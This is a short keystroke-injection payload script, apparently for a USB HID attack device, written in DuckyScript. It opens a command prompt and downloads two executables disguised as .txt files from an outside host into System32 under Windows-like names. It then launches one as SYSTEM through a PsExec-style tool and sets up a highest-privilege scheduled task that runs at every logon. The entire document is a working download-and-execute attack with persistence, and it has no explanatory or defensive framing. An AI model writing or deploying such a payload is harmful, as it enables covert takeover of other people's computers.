WINDOWS q
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 300
RIGHTARROW
DELAY 300
RIGHTARROW
DELAY 300
RIGHTARROW
DELAY 300
ENTER
DELAY 800
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://domain/winmgnt.txt','%WINDIR%\System32\winmgnt.exe')
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://domain/taskmgnt.txt','%WINDIR%\System32\taskmgnt.exe')
ENTER
STRING %WINDIR%\System32\taskmgnt.exe -i -d -s /accepteula %WINDIR%\System32\winmgnt.exe
ENTER
STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\winmgnt.exe"
ENTER
STRING exit
ENTER
